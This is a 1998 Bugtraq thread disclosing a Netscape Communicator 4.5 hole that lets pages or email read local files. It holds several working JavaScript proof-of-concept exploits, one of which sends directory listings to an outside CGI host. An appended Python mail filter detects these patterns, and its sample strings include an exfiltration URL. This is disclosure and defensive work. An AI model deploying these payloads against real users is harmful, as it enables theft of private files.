[ http://www.rootshell.com/ ]

Date: Mon, 23 Nov 1998 10:36:40 PST
From: Georgi Guninski <guninski@HOTMAIL.COM>
Subject: Netscape Communicator 4.5 can read local files

There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for WinNT 4.0 (probably others) which allows reading files from the user's computer. It is not necessary for the file name to be known, because directories may be browsed. The contents of the file may be sent to an arbitrary host. In order for this to work, you need both Java and Javascript enabled. The bug may be exploited by email message.

Demonstration is available at:
http://www.geocities.com/ResearchTriangle/1711/b6.html

Workaround: Disable Javascript or Java.

The Javascript code is:

sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) && (i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";

Regards,
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711

----------------------------------------------------------------
Date: Mon, 23 Nov 1998 20:49:37 +0000
From: The Spirit of the Black Panther <panther@DSIS.NET>
Subject: Re: Netscape Communicator 4.5 can read local files

I have just tested this bug in Netscape 4.5 on a RedHat Linux 5.1 machine, Kernel 2.0.34, and with minor patching of the java it is also effective. I was successful in retrieving ANY LOCAL FILE with the World readable attribute. This includes the /etc/passwd file!

In netscape, Edit>Preferences>Advanced>Disable Javascript in Mail and News will block this exploit, unless the person has access to your web server.

----------------------------------------------------------------
Date: Tue, 24 Nov 1998 20:23:25 -0800
From: Ryan Russell <Ryan.Russell@SYBASE.COM>
Subject: Re: Netscape Communicator 4.5 can read local files

It's vastly different. Did you try creating c:\test.txt and putting something in it, and going to that page? Notice that it pops the first line in a dialog box. That means it has that info under programmatic control, and can send it across the network back to the web server, exactly as claimed in the original advisory.

Contrast that with (you) opening your c: drive with Communicator. You can browse local files, but only you get to see the contents, and that window isn't under any kind of programmatic control from other windows... at least that's how it's supposed to work.

It's similar to the Java sandbox concept. Local and signed content are "trusted" and can do whatever they like, whereas remotely loaded content is "untrusted" and isn't supposed to be able to perform certain operations. When you (well, Netscape and Microsoft) try to mix the two, invariably mistakes will be made, and leaks will happen between the two.

Ryan

----------------------------------------------------------------
Date: Wed, 25 Nov 1998 15:28:45 -0500
From: Terence Christopher Haddock <haddock@UDEL.EDU>
Reply-To: thaddock@poboxes.com
Subject: Re: Netscape Communicator 4.5 can read local files

This security hole is not limited to knowing a specific file name; it can be used to list the contents of a directory, which I believe is much more insidious. This script can send a list of the files in the user's root directory under windows:

sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"b=\"Here is the files in your root directory:\";"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();"+
"for (var x=0;x<files.length;x++){"+
"b+=files[x]+\"\n\""+
"};"+
"alert(b);";

(Simple to modify it for UNIX)

Using a search algorithm the script could search for specific files by running this recursively. The only problem (from a hacker's perspective, a good thing from our perspective) is all of the windows it would open. If a way could be worked around this (which I think it can), this script could run without a user even knowing it, searching the user's directories and reporting them to a server.

Sincerely,
Terence C. Haddock

----------------------------------------------------------------
Terence Christopher Haddock (haddock@UDEL.EDU)
Wed, 25 Nov 1998 14:22:12 -0500

Ben Collins's file contains the text "this is really stupid.". He's running a UNIX version of Netscape, so I had to modify the script. Unfortunately, the following does not work under both UNIX and Windows:

sl=window.open("wysiwyg://1/file://");

It works under UNIX, but not under Windows. A simple check of the OS would take care of the distinction, however, so that wouldn't slow any would-be hackers down. Also, if they know their target, then they know what kind of OS they're dealing with.

Sincerely,
Terence C. Haddock
University of Delaware

On Wed, 25 Nov 1998, Ben Collins wrote:
> I would just like to say that I find it hard to believe so much fuss has
> been made about this. It is clear that this is only a local 'trick' to
> look like it has gotten info. There used to be earlier versions of this
> where ppl would make a link to file:///C|/ and say they had your hard drive
> contents on their webpage, and now that java/javascript is involved
> everyone is freaking out over the same thing just done a little more
> elaborately.
>
> If someone here can set up a webpage, send me the URL, have that page read
> the file '/test.txt' from my hard drive and then that person send the
> contents to this list, I will believe. Otherwise I think this whole
> hysteria over 'unforeseen' dangers should stop.
>
> --
> Ben Collins <b.m.collins@larc.nasa.gov>  Debian GNU/Linux
> UnixGroup Admin - Jordan Systems Inc.     bcollins@debian.org
> The Choice of the GNU Generation

----------------------------------------------------------------
Date: Thu, 26 Nov 1998 12:31:35 +0100
From: Michael Teichmann <teichmann@TECMATH.DE>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator 4.5 can read local files

> I've whipped up a couple of demos of this bug that send the contents to a
> cgi. There is a windows version that I know works, and a unix version I
> can't test because my linux box is down (it's a hardware thing). This is
> for anyone who has doubts....
>
> http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze)
>
> http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX)
>
> And yes, it can email it to you if you like :)

And if you wish, it can even read your directory structure:
(works for Win, but Unix should be straightforward)

//slight change of Trev's script:
<SCRIPT>
alert("List your files in C:\\ and it will be sent to a cgi script.");
sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length) {b += fl[i]+\"\\\\n\"; i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'";
</SCRIPT>

At least it seems it can not *write* to local files; I get a security exception when I try that.

----------------------------------------------------------------
Date: Thu, 26 Nov 1998 17:43:31 +0100
From: Norbert Luckhardt <nl@CT.HEISE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator 4.5 can read local files

Hi there,

At 19:36 23.11.98 , you wrote:
>There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for
>WinNT 4.0 (probably others)

We just tried it on the Mac. Surely the script has to be adapted, since the Mac doesn't use drive letters, so if you don't know the names of the drive you cannot give an absolute path, but it could work with relative paths:

sl=window.open("wysiwyg://1/file:////");

Those 4 slashes show the directory in which Netscape is installed (every extra slash goes one dir up). It is at least possible to get files from that directory with:

java.io.File(\"test.txt\")

Alas, I'm not so firm with JavaScript and thus I did not get working code with the quoting for higher dir levels; I earned only JavaScript errors. But I think this is only my personal problem, isn't it?! ;-)

have fun, Shalom dann,
Norbert

--
Norbert Luckhardt       http://www.heise.de/ct/Redaktion/nl/
Redaktion c't           Tel.: +49 511 5352 - 300
Helstorfer Str. 7       Fax:  +49 511 5352 - 417
D-30625 Hannover        BBS:  +49 511 5352 - 301
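As an added example (not code from the thread, from Netscape, or from any of the posters), here is a small Python filter a mail gateway or proxy could run over HTML and mail bodies to flag the building blocks this thread describes: a wysiwyg:// wrapper around a file: URL, LiveConnect java.io calls from a javascript: URL, a File.list() directory walk, and the '</'+'SCRIPT>' split-tag trick. The sample bodies and the collector URL are constructed placeholders.

```python
import re
from html import unescape

# Detection rules derived from the scripts quoted in this thread. A wysiwyg://
# window wrapping a file: URL is the piece that puts the page in Netscape's
# local (trusted) context; java.io access from a javascript: URL is the read;
# File.list() is the directory walk; the split end tag smuggles a <SCRIPT>.
RULES = [
    ("wysiwyg_file_url", re.compile(r"wysiwyg://\d+/file:", re.I)),
    ("liveconnect_file_io",
     re.compile(r"javascript:.*?java\.io\.(File|FileInputStream)\b", re.I | re.S)),
    ("directory_listing", re.compile(r"java\.io\.File\b.*?\.list\(\)", re.I | re.S)),
    ("split_script_tag", re.compile(r"</'\s*\+\s*'SCRIPT>", re.I)),
]

def scan(body: str) -> list[str]:
    """Return the names of every rule that matches one HTML or mail body."""
    text = unescape(body)  # also catch patterns hidden behind entity encoding
    return [name for name, rx in RULES if rx.search(text)]

def verdict(body: str) -> str:
    """block: local file access routed through a wysiwyg: window;
    review: only some of the pieces are present; allow: nothing matched."""
    hits = scan(body)
    if "wysiwyg_file_url" in hits and "liveconnect_file_io" in hits:
        return "block"
    return "review" if hits else "allow"

# Constructed samples (not real messages). The first two mirror the shape of
# the thread's read-a-file and list-a-directory scripts; collector.example is
# a placeholder host. The remaining three are benign or incomplete for contrast.
SAMPLES = {
    "read_file": r'''sl=window.open("wysiwyg://1/file:///C|/"); sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>var f=new java.io.File(\"C:\\\\test.txt\");
var fis=new java.io.FileInputStream(f);alert(fis.read());</'+'SCRIPT>'";''',
    "list_dir": r'''sl=window.open("wysiwyg://1/file:///C|/"); sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>var f=new java.io.File(\"C:\\\\\");
var fl=f.list();w=window.open(\"http://collector.example/q?\"+escape(fl.join(\",\")));
</'+'SCRIPT>'";''',
    "plain_link": '<a href="file:///C|/">look at your own drive</a>',
    "plain_js": '<a href="javascript:alert(document.title)">hi</a>',
    "unsigned_io": '<SCRIPT>var f=new java.io.File("."); alert(f.list());</SCRIPT>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:12} {verdict(body):7} {scan(body)}")
```

The "unsigned_io" sample lands in "review" rather than "block" because, as Teichmann's note about the security exception suggests, java.io from an ordinary untrusted page is what the sandbox is supposed to refuse; it is the wysiwyg: wrapper that makes the combination dangerous.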